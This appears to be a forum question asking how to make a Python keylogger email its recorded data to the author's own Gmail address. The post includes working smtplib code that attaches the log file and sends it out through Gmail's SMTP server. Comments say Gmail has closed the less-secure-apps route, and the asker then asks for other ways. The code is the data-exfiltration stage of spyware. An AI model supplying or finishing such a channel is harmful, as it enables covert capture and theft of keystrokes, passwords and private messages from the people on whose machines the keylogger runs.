# how can i add email function to a simple python keylogger

Tags: python, keylogger

wondering how i can set my python keylogger up to send emails of the data it records to a specific email address instead of logging it all on a file on the host system.

i tried using this widely available code (down below)  but could not properly set it up to send the emails to my email address. the program still runs fine however, i think it may be due to gmail cracking down on applications like these. or i just didn't change the code properly.

```
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders

email_user = 'email sender address, probably same as email_send'
email_send = 'your email address @gmail.com'
email_password = 'your email password'
subject = 'Ethical Keylogger'

msg = MIMEMultipart()
msg['From'] = email_user
msg['To'] = email_send
msg['Subject'] = subject

body = 'Here is the keylogger.'
msg.attach(MIMEText(body,'plain'))

filename = 'FILE LOCATION' #INSERT FILE LOCATION
attachment = open(filename, 'rb')

part = MIMEBase('application', 'octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition', "attachment; filename= "+filename)

msg.attach(part)
text = msg.as_string()
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login(email_user, email_password)


server.sendmail(email_user, email_send, text)
server.quit()
```

maybe i'm not changing the code to my own needed parameters properly... i'm not sure.

Comment: Yes, you are correct, [Less secure apps](https://myaccount.google.com/u/0/lesssecureapps) option is no longer available.

Comment: good morning! is there anyway else i could accomplish this ?